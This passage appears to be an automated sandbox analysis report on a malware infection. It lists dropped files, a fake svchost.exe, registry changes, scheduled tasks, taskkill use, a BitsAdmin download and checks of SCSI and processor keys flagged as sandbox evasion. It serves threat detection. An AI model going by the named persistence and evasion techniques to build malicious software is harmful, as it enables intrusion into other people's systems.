autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\bbc_co_uk.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\error_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_browse.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\view.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js autosubplayer.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe zt3fotSIgq8mlNObpN9zV4Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe ZKiBxX_lZY4IIzpkXK7L8Xle.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini ZKiBxX_lZY4IIzpkXK7L8Xle.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll autosubplayer.exe -
Drops file in Windows directory 15 IoCs
Processes:
YTDtEif11P99NgeKwT6fC4ch.exemsiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process File created C:\Windows\System\xxx1.bak YTDtEif11P99NgeKwT6fC4ch.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri File created C:\Windows\rescache\_merged\3720402701\2274612954.pri msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\System\svchost.exe YTDtEif11P99NgeKwT6fC4ch.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\System\svchost.exe YTDtEif11P99NgeKwT6fC4ch.exe File created C:\Windows\System\xxx1.bak svchost.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2288 1316 WerFault.exe ADP8vL2SLdGPH8L7FyA9nk0u.exe 4540 2280 WerFault.exe 3fQcxDlp43cF_Lkgp2hF3etw.exe 2236 2760 WerFault.exe NpQFFR5PLBhAmQZ0HxCbwNxm.exe 4968 5108 WerFault.exe build.exe -
NSIS installer 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\S8LGJghE7EKxPiR6DNQktZgV.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\S8LGJghE7EKxPiR6DNQktZgV.exe nsis_installer_2 C:\Users\Admin\Pictures\Adobe Films\S8LGJghE7EKxPiR6DNQktZgV.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\S8LGJghE7EKxPiR6DNQktZgV.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
CObebYmiTdY_PuwpkFiVDpKe.exe8A71.exeHpQtObz62dT6szj1j12odrbQ.exeF190.exebfusvrrbwusvrruiusvrrdescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI CObebYmiTdY_PuwpkFiVDpKe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8A71.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HpQtObz62dT6szj1j12odrbQ.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F190.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F190.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bfusvrr Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bfusvrr Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwusvrr Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwusvrr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI CObebYmiTdY_PuwpkFiVDpKe.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8A71.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HpQtObz62dT6szj1j12odrbQ.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F190.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uiusvrr Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bfusvrr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwusvrr Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI CObebYmiTdY_PuwpkFiVDpKe.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8A71.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HpQtObz62dT6szj1j12odrbQ.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uiusvrr Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uiusvrr -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exebuild2.exe8E9C.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8E9C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8E9C.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4900 schtasks.exe 4676 schtasks.exe 5100 schtasks.exe 7140 schtasks.exe 7064 schtasks.exe 8000 schtasks.exe 7948 schtasks.exe 4008 schtasks.exe 9040 schtasks.exe 4984 schtasks.exe 4480 schtasks.exe 4124 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 4232 timeout.exe 2976 timeout.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5516 taskkill.exe 2224 taskkill.exe 8912 taskkill.exe 5096 taskkill.exe 4312 taskkill.exe 5988 taskkill.exe 192 taskkill.exe 9000 taskkill.exe -
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exebrowser_broker.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 16 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exemsiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerundll32.exesvchost.execmd.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{16F7D342-F974-4E18-9704-CECF37309CFC} = "0" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory msiexec.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{K2QMW1I5-C7CF-APK0-W60J-X1GR5HEJENXO}\1 = "25" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{U9IGI0Q2-B7HR-SAI9-Z61V-J0SY8EIASHJB}\650478DC7424C37C\2 = "1" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 25b0743d06c1d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix msiexec.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{K5LCW0M1-B0IY-MYL1-T02I-K3XH6KLEMLHY}\1 = "8512" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ae197aa65fc7d701 msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 25b0743d06c1d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6d7d92905fc7d701 msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{U9IGI0Q2-B7HR-SAI9-Z61V-J0SY8EIASHJB} svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8274a8c05fc7d701 msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local 